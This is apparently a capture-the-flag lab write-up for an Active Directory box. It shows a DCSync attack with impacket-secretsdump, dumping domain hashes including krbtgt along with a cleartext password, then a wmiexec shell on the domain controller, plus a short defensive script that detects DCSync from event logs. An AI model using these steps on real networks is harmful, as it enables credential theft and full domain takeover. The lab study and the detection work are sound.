DCSync
Performing the DCSync attack using the TGT of the administrator user
Hashdump
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=administrator@dc01.infiltrator.htb.ccache impacket-secretsdump INFILTRATOR.HTB/@dc01.infiltrator.htb -k -no-pass -dc-ip $IP -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN CIFS/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Service RemoteRegistry is already running
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0xb69149edc42a85733e4efe5e35a33e87
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4dc8e10f3a29237b05bdfdb5bded5451:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[+] Looking into NL$2
[+] Looking into NL$3
[+] Looking into NL$4
[+] Looking into NL$5
[+] Looking into NL$6
[+] Looking into NL$7
[+] Looking into NL$8
[+] Looking into NL$9
[+] Looking into NL$10
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
[+] Could not calculate machine account Kerberos keys, only printing plain password (hex encoded)
INFILTRATOR\DC01$:plain_password_hex:0a3183391dac772712b98e94fead3b9456bfedcc57c953d18084f50e94cf42d6c08434a1d3217c2fe151916a0ae7867c415ab8d3546f4ecc4707410ca56e2556aef2298066f7842ec1ad4819706032c10db5d22ff762c9a4fdeb82405627c04ed0ae8ee0514170acb1f0fa8964a2d045ba16b749ef89933bccd53b25a8aa0f5d17c2d519f9aa7a939b1fb9701bb88a1abb5efdfbcd02226e09032d8ffced8801e6cf8adf16bceb1491482d23a8281326cc82a6fa06425336d1422cd3b1cadd389263a9f557ce5221a86b28a71dc6276a0ac8165b7c5c5929dd3998130bbd7b9e41b9a8e4d69e1b7a614f25b6a8aa672b
INFILTRATOR\DC01$:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f:::
[+] Looking into DefaultPassword
[*] DefaultPassword
INFILTRATOR\Administrator:Infiltrator_Box1337!
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
dpapi_machinekey:0xbd8a15f7e24918ac40db6b340498aeda032c4fc0
dpapi_userkey:0xf0f81997f3c057103ab87ac71dc986c455880e83
[+] Looking into NL$KM
[*] NL$KM
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_ZnEfRYca
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Calling DRSGetNCChanges for S-1-5-21-2606098828-3734741516-3625406802-500
[+] SID lookup unsuccessful, falling back to DRSCrackNames/GUID lookups
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-500
[+] Calling DRSGetNCChanges for {f3f4f5a3-708a-47f6-966f-4b247ec76492}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=infiltrator,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-501
[+] Calling DRSGetNCChanges for {4adb7eb1-fb0c-4cb3-b8f2-8d4ba8d1f02d}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Guest,CN=Users,DC=infiltrator,DC=htb
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-502
[+] Calling DRSGetNCChanges for {09e6a8b4-1bfd-4127-80e4-7aa81dc8dd6f}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=infiltrator,DC=htb
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d400d2ccb162e93b66e8025118a55104:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1103
[+] Calling DRSGetNCChanges for {b5828c3a-8f36-4b49-b2fb-80d4f38fc7d5}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=D.anderson,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\D.anderson:1103:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1104
[+] Calling DRSGetNCChanges for {42c540c8-25fa-4063-abee-4c564e30a726}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=L.clark,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\L.clark:1104:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1105
[+] Calling DRSGetNCChanges for {c27dc7d3-af00-46f1-86f0-06056b64a5be}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=M.harris,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\M.harris:1105:aad3b435b51404eeaad3b435b51404ee:3ed8cf1bd9504320b50b2191e8fb7069:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1106
[+] Calling DRSGetNCChanges for {69617988-a46d-4729-a7ed-4a66f88aeaaf}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=O.martinez,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\O.martinez:1106:aad3b435b51404eeaad3b435b51404ee:daf40bbfbf00619b01402e5f3acd40a9:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1107
[+] Calling DRSGetNCChanges for {995da9d6-0078-4125-a9cc-6a336722f1b6}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=A.walker,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\A.walker:1107:aad3b435b51404eeaad3b435b51404ee:f349468bb2c669ec8c3fd4154fdfe126:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1108
[+] Calling DRSGetNCChanges for {065b6def-5e48-45c5-911d-bab5a89d6543}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=K.turner,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\K.turner:1108:aad3b435b51404eeaad3b435b51404ee:a119c0d5af383e9591ebb67857e2b658:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1109
[+] Calling DRSGetNCChanges for {82441465-3bc3-4ac8-9512-e11b53d042ed}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=E.rodriguez,OU=Marketing Digital,DC=infiltrator,DC=htb
infiltrator.htb\E.rodriguez:1109:aad3b435b51404eeaad3b435b51404ee:b02e97f2fdb5c3d36f77375383449e56:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1601
[+] Calling DRSGetNCChanges for {b3d4184d-4d18-4bce-a377-1e786d162320}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=winrm_svc,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\winrm_svc:1601:aad3b435b51404eeaad3b435b51404ee:120c6c7a0acb0cd808e4b601a4f41fd4:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-8101
[+] Calling DRSGetNCChanges for {15bce2ec-4fa9-44fe-bc24-e800b252f557}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=lan_managment,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\lan_managment:8101:aad3b435b51404eeaad3b435b51404ee:a1983d156e1d0fdf9b01208e2b46670d:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1000
[+] Calling DRSGetNCChanges for {8a93971a-f449-4c71-9b39-d60657be83fc}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=infiltrator,DC=htb
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-3102
[+] Calling DRSGetNCChanges for {2c70ab20-216f-44b3-b392-2e1fddb8567f}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=infiltrator_svc,CN=Managed Service Accounts,DC=infiltrator,DC=htb
infiltrator_svc$:3102:aad3b435b51404eeaad3b435b51404ee:52dfec373c144cb8d50334cb73934612:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
[*] Cleaning up...
Domain Level Compromise
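Added example (not part of the original notes): the DRSGetNCChanges calls in the output above exercise the directory replication rights, which a domain controller can record as Security event 4662 when directory service access auditing is enabled. The sketch below filters such events for replication-right GUIDs used by a principal that is not a known DC; the event records and the KNOWN_REPLICATORS allow-list are constructed assumptions.

```python
import re

# Control-access right GUIDs checked when a principal requests replication
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Assumption: allow-list of legitimate replication principals, kept by the defender
KNOWN_REPLICATORS = {"dc01$"}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed 4662 records for illustration; keys follow the event's field names
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "Administrator", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "M.harris", "AccessMask": "0x10",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "Administrator", "AccessMask": "", "Properties": ""},
]

def find_dcsync_candidates(events, known_replicators=KNOWN_REPLICATORS):
    """Return (account, right names) for replication rights used outside the allow-list."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if int(ev.get("AccessMask") or "0", 16) & 0x100 == 0:  # Control Access bit not set
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        account = ev.get("SubjectUserName", "")
        if rights and account.lower() not in known_replicators:
            hits.append((account, rights))
    return hits

if __name__ == "__main__":
    for account, rights in find_dcsync_candidates(SAMPLE_EVENTS):
        print(f"ALERT replication right used by non-DC principal {account}: {', '.join(rights)}")
```

The DC01$ record is ignored because normal DC-to-DC replication generates the same event; only the allow-list separates it from a request like the one in these notes, so that list has to cover every domain controller and any sanctioned sync service.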
Shelldrop
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=administrator@dc01.infiltrator.htb.ccache impacket-wmiexec INFILTRATOR.HTB/@dc01.infiltrator.htb -k -no-pass -dc-ip $IP -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN CIFS/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[*] SMBv3.0 dialect used
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN HOST/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Target system is dc01.infiltrator.htb and isFQDN is True
[+] StringBinding: dc01[52354]
[+] StringBinding chosen: ncacn_ip_tcp:dc01.infiltrator.htb[52354]
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN HOST/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN HOST/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN HOST/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\> whoami
infiltrator\administrator
C:\> hostname
dc01
C:\> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.180.75
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
System Level Compromise